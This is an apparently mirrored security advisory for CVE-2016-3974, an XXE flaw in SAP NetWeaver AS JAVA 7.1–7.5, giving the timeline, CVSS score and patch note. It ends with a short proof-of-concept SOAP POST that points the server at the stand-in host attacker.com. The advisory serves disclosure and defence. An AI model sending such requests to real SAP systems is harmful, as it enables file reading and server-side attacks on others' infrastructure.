SAP NetWeaver AS JAVA 7.1 < 7.5 - ctcprotocol Servlet XXE

🗓️ 21 Jun 2016 00:00:00Reported by ERPScanType

zdt🔗 0day.today👁 54 Views

SAP NetWeaver AS JAVA XXE vulnerabilit

Reporter	Title	Published	Views	Family All 10
CNVD	SAP NetWeaver Java AS XXE Vulnerability	8 Apr 201600:00	–	cnvd
CVE	CVE-2016-3974	7 Apr 201619:00	–	cve
Cvelist	CVE-2016-3974	7 Apr 201619:00	–	cvelist
Exploit DB	SAP NetWeaver AS JAVA 7.1 < 7.5 - 'ctcprotocol Servlet' XML External Entity	21 Jun 201600:00	–	exploitdb
erpscan	SAP NetWeaver Java AS ctcprotocol servlet - XXE vulnerability	20 Oct 201500:00	–	erpscan
exploitpack	SAP NetWeaver AS JAVA 7.1 7.5 - ctcprotocol Servlet XML External Entity	21 Jun 201600:00	–	exploitpack
NVD	CVE-2016-3974	7 Apr 201619:59	–	nvd
OpenVAS	SAP NetWeaver AS Java Multiple Vulnerabilities (2235994, 2234971, 2238375)	21 Jun 201600:00	–	openvas
Packet Storm	SAP NetWeaver AS JAVA 7.5 XXE Injection	17 Jun 201600:00	–	packetstorm
Prion	Xxe	7 Apr 201619:59	–	prion

Application: SAP NetWeaver AS JAVA
 
Versions Affected: SAP NetWeaver  AS JAVA 7.1 - 7.5
 
Vendor URL: http://SAP.com
 
Bug: XXE
 
Sent:  20.10.2015
 
Reported: 21.10.2015
 
Vendor response: 21.10.2015
 
Date of Public Advisory: 08.03.2016
 
Reference: SAP Security Note 2235994
 
Author:  Vahagn Vardanyan  (ERPScan)
 
 
 
Description
 
 
1. ADVISORY INFORMATION
 
Title: [ERPSCAN-16-013] SAP NetWeaver  AS  Java ctcprotocol servlet –
XXE vulnerability
 
Advisory ID: [ERPSCAN-16-013]
 
Risk: Medium
 
Advisory URL: https://erpscan.com/advisories/erpscan-16-013-sap-netweaver-7-4-ctcprotocol-servlet-xxe/
 
Date published: 08.03.2016
 
Vendors contacted: SAP
 
 
2. VULNERABILITY INFORMATION
 
Class: XXE
 
Impact: denial of service
 
Remotely Exploitable: Yes
 
Locally Exploitable: No
 
CVE-2016-3974
 
 
CVSS Information
 
CVSS Base Score v3:  6.4  / 10
 
CVSS Base Vector:
 
AV : Attack Vector (Related exploit range) Network (N)
 
AC : Attack Complexity (Required attack complexity) High (H)
 
PR : Privileges Required (Level of privileges needed to exploit) High (H)
 
UI : User Interaction (Required user participation) None (N)
 
S : Scope (Change in scope due to impact caused to components beyond
the vulnerable component) Unchanged (U)
 
C : Impact to Confidentiality High (H)
 
I : Impact to Integrity High (H)
 
A : Impact to Availability High (H)
 
 
 
3. VULNERABILITY DESCRIPTION
 
Authorized attacker can use a special request to read files from the
server and then escalate his or her privileges.
 
 
 
4. VULNERABLE PACKAGES
 
SAP NetWeaver AS JAVA 7.1 - 7.5
 
Other versions are probably affected too, but they were not checked.
 
 
5. SOLUTIONS AND WORKAROUNDS
 
To correct this vulnerability, install SAP Security Note 2235994
 
 
 
6. AUTHOR
 
Vahagn Vardanyan  (ERPScan)
 
 
7. TECHNICAL DESCRIPTION
 
 
An XML external entity (XXE) vulnerability in the Configuration Wizard
in SAP NetWeaver Java AS 7.4 allows remote attackers to cause a denial
of service, conduct SMB Relay attacks, or access arbitrary files via a
crafted XML request related to the ctcprotocol servlet.
 
PoC
 
 
POST /_tc~monitoring~webservice~web/ServerNodesWSService HTTP/1.1
Content-Type: text/xml
 
<SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SOAP-ENV:Body>
 <m:XXX xmlns:m="http://sap.com/monitoring/ws/sn/">
  <url>attacker.com</url>
 </m:XXX>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
 
 
 
 
8. REPORT TIMELINE
 
Sent:  20.10.2015
 
Reported: 21.10.2015
 
Vendor response: 21.10.2015
 
Date of Public Advisory: 08.03.2016
 
 
 
 
9. REFERENCES
 
https://erpscan.com/advisories/erpscan-16-013-sap-netweaver-7-4-ctcprotocol-servlet-xxe/

#  0day.today [2018-01-03]  #

21 Jun 2016 00:00Current

0.1Low risk

Vulners AI Score0.1

EPSS0.12625